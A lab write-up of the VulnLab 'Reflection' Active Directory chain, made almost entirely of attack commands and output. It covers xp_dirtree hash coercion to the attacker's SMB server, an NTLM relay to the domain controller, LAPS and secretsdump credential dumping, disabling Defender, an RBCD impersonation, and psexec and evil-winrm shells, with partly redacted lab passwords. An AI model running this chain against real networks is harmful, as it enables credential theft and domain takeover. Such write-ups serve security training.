vulnlab-reflection
Reflection is a medium Active Directory chain which consists of three machines, MS01
, WS01
and DC01
, from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod
share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith
having GenericAll
on MS01 through which can read the LAPS
password and further dumping the Georgia.Price
password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD)
and again from dumping we’ll get Rhys.Garner
‘s password, whose password we can reuse on DOM_RGARNER
who is a part of domain admin.
Writeup:
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares SMB ms01.reflection.vl 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False) SMB ms01.reflection.vl 445 MS01 [+] reflection.vl\puck: SMB ms01.reflection.vl 445 MS01 [+] Enumerated shares SMB ms01.reflection.vl 445 MS01 Share Permissions Remark SMB ms01.reflection.vl 445 MS01 ----- ----------- ------ SMB ms01.reflection.vl 445 MS01 ADMIN$ Remote Admin SMB ms01.reflection.vl 445 MS01 C$ Default share SMB ms01.reflection.vl 445 MS01 IPC$ READ Remote IPC SMB ms01.reflection.vl 445 MS01 staging READ staging environment ┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ smbclient //ms01.reflection.vl/staging Password for [WORKGROUP\puck]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jun 7 19:42:48 2023 .. D 0 Wed Jun 7 19:41:25 2023 staging_db.conf A 50 Thu Jun 8 13:21:49 2023 6261245 blocks of size 4096. 1153753 blocks available smb: \> cat staging_db.conf cat: command not found smb: \> get staging_db.conf getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \> --- ┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ cat staging_db.conf user=web_staging password=Washroom510 db=staging
mssql enum
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (web_staging guest@master)> enum_users UserName RoleName LoginName DefDBName DefSchemaName UserID SID ------------------ -------- --------- --------- ------------- ---------- ----- dbo db_owner sa master dbo b'1 ' b'01' guest public NULL NULL guest b'2 ' b'00' INFORMATION_SCHEMA public NULL NULL NULL b'3 ' NULL sys public NULL NULL NULL b'4 ' NULL SQL (web_staging guest@master)> enum_db name is_trustworthy_on ------- ----------------- master 0 tempdb 0 model 0 msdb 1 staging 0 SQL (web_staging guest@master)> use staging; [*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging [*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'. SQL (web_staging dbo@staging)> SQL (web_staging dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE' TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- SQL (web_staging dbo@staging)> select * from staging.information_schema.tables; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- staging dbo users b'BASE TABLE' SQL (web_staging dbo@staging)> select * from users; id username password -- -------- ------------- 1 b'dev01' b'Initial123' 2 b'dev02' b'Initial123' SQL (web_staging dbo@staging)> SQL (web_staging dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1; subdirectory depth file ------------ ----- ---- SQL (web_staging dbo@staging)>
john svc_web_staging.hash –wordlist=/usr/share/wordlists/rockyou.txt -> uncrackable
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-smbserver -smb2support share . Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.203.134,51852) [*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01) [*] User MS01\svc_web_staging authenticated successfully [*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] Closing down connection (10.10.203.134,51852) [*] Remaining connections []
Next we do a NTLMrelay attack to dc01.reflection.vl
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client DCSYNC loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133 [*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED [*] Started interactive SMB client shell via TCP on 127.0.0.1:11000 [*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left! [*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
We trigger it from our sqlshell
SQL (web_staging dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1; subdirectory depth file ------------ ----- ---- SQL (web_staging dbo@staging)>
and in another terminal window on my kali box
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ nc 127.0.0.1 11000 Type help for list of commands # shares ADMIN$ C$ IPC$ NETLOGON prod SYSVOL # use prod # ls drw-rw-rw- 0 Wed Jun 7 19:44:26 2023 . drw-rw-rw- 0 Wed Jun 7 19:43:22 2023 .. -rw-rw-rw- 45 Thu Jun 8 13:24:39 2023 prod_db.conf # get prod_db.conf # ┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ cat prod_db.conf user=web_prod password=Tr<redacted>01 db=prod
.
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success MSSQL dc01.reflection.vl 1433 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01) MSSQL dc01.reflection.vl 1433 DC01 [+] web_prod:Tribesman201 MSSQL dc01.reflection.vl 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'. MSSQL dc01.reflection.vl 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'. MSSQL dc01.reflection.vl 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'. MSSQL dc01.reflection.vl 1433 DC01 [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.
sqsh to dc01.reflection.vl
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01' sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty' 1> use prod; 2> go 1> select * from users; 2> go -m vert id: 1 name: abbie.smith password: CM<redacted>Ew id: 2 name: dorothy.rose password: hC<redacted>SJ (2 rows affected)
ldap search
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt SASL/DIGEST-MD5 authentication started SASL username: abbie.smith SASL SSF: 128 SASL data security layer installed.
bloodhound
bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp
check machine quota
──(puck㉿kali)-[~/vulnlab/reflection] └─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq SMB dc01.reflection.vl 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False) LDAP dc01.reflection.vl 389 DC01 [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ MAQ dc01.reflection.vl 389 DC01 [*] Getting the MachineAccountQuota MAQ dc01.reflection.vl 389 DC01 MachineAccountQuota: 0
check LAPS
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps SMB DC01 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False) LDAP DC01 389 DC01 [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw LAPS DC01 389 DC01 [*] Getting LAPS Passwords LAPS DC01 389 DC01 Computer: MS01$ Password: H44<redacted>}xi
check pasword used users on ws01.reflection.vl
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth SMB ws01.reflection.vl 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False) SMB ws01.reflection.vl 445 MS01 [+] MS01\Administrator:H4<redacted>xi (Pwn3d!) SMB ws01.reflection.vl 445 MS01 [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE SMB ws01.reflection.vl 445 MS01 [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE SMB ws01.reflection.vl 445 MS01 [+] MS01\DC01$:H4*xi SMB ws01.reflection.vl 445 MS01 [+] MS01\krbtgt:H4*xi SMB ws01.reflection.vl 445 MS01 [+] MS01\MS01$:H4*xi SMB ws01.reflection.vl 445 MS01 [+] MS01\WS01$:H4*xi SMB ws01.reflection.vl 445 MS01 [+]
Do a secretsdump
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345::: labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e::: [*] Dumping cached domain logon information (domain/username:hash) REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01) REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08) REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23) [*] Dumping LSA Secrets [*] $MACHINE.ACC REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72 REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0 REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31 REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc::: [*] DPAPI_SYSTEM dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7 dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc [*] NL$KM 0000 C0 BE 31 EA 49 A4 51 79 67 62 D2 F1 C2 22 1C BE ..1.I.Qygb...".. 0010 CE 86 94 CF D5 32 5D 73 32 64 85 4C 37 81 7B AE .....2]s2d.L7.{. 0020 0C D1 61 83 A3 65 91 58 D6 F0 B3 17 47 5F 64 93 ..a..e.X....G_d. 0030 A4 AC D7 4F E7 E4 A5 EE E8 6D BE 93 7A CF 35 77 ...O.....m..z.5w NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577 [*] _SC_MSSQL$SQLEXPRESS REFLECTION\svc_web_staging:DivinelyPacifism98 [*] Cleaning up... [*] Stopping service RemoteRegistry
We use the admin account to RDP to the Box and start enumerating it
xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx
on MS01 disable defender upload mimikatz.exe , we find :
Georgia.Price
DBl<redacted>id
RBCD attack op ws01.reflection.com ( via ms01 )
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-secretsdump administrator@ms01.reflection.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password: H44<redacted>xi [*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345::: labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e::: [*] Dumping cached domain logon information (domain/username:hash) REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01) REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08) REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54) [*] Dumping LSA Secrets [*] $MACHINE.ACC REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b REFLECTION\MS01$:des-cbc-md5:7943755b4f326449 REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755 REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a::: [*] DPAPI_SYSTEM dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7 dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc [*] NL$KM 0000 C0 BE 31 EA 49 A4 51 79 67 62 D2 F1 C2 22 1C BE ..1.I.Qygb...".. 0010 CE 86 94 CF D5 32 5D 73 32 64 85 4C 37 81 7B AE .....2]s2d.L7.{. 0020 0C D1 61 83 A3 65 91 58 D6 F0 B3 17 47 5F 64 93 ..a..e.X....G_d. 0030 A4 AC D7 4F E7 E4 A5 EE E8 6D BE 93 7A CF 35 77 ...O.....m..z.5w NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577 [*] _SC_MSSQL$SQLEXPRESS REFLECTION\svc_web_staging:DivinelyPacifism98 [*] Cleaning up...
then
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
then
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] MS01$ can now impersonate users on WS01$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] MS01$ (S-1-5-21-3375389138-1770791787-1490854311-1104)
then
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache ┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache
and a secretsdump to ws01.reflection.com
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575::: labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02::: [*] Dumping cached domain logon information (domain/username:hash) REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05) [*] Dumping LSA Secrets [*] $MACHINE.ACC REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800 REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1::: [*] DefaultPassword reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP [*] DPAPI_SYSTEM dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8 dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb [*] NL$KM 0000 DE AA F4 50 81 29 7C 82 0D 6F F2 2D 08 8B A2 7A ...P.)|..o.-...z 0010 7D 46 9F 66 C3 8F D4 9A FA DB D2 9D 56 9A 79 28 }F.f........V.y( 0020 10 1F 8F 40 B4 EB 04 6F 42 8F 37 02 7E E5 85 93 ...@...oB.7.~... 0030 00 9C 28 46 DE 39 3F BB 78 90 E7 C8 AB 3A 75 D1 ..(F.9?.x....:u. NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1 [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry
.
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [!] This will work ONLY on Windows >= Vista [*] Creating task \yVNLerVO [*] Running task \yVNLerVO [*] Deleting task \yVNLerVO [*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp [*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp nt authority\system
.
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [!] This will work ONLY on Windows >= Vista [*] Creating task \AvHKoFmN [*] Running task \AvHKoFmN [*] Deleting task \AvHKoFmN [*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp [*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp [*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
.
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Requesting shares on WS01.reflection.vl..... [*] Found writable share ADMIN$ [*] Uploading file YQydtkPz.exe [*] Opening SVCManager on WS01.reflection.vl..... [*] Creating service dvqZ on WS01.reflection.vl..... [*] Starting service dvqZ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.19045.2965] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32> -- c:\Users\Rhys.Garner\Desktop> type flag.txt VL{ba<redacted>eb}
.
┌──(puck㉿kali)-[~/vulnlab/reflection] └─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir *Evil-WinRM* PS C:\Users\administrator\desktop> dir Directory: C:\Users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/8/2023 4:24 AM 36 flag.txt *Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt VL{05<redacted>17} *Evil-WinRM* PS C:\Users\administrator\desktop>
That’s all.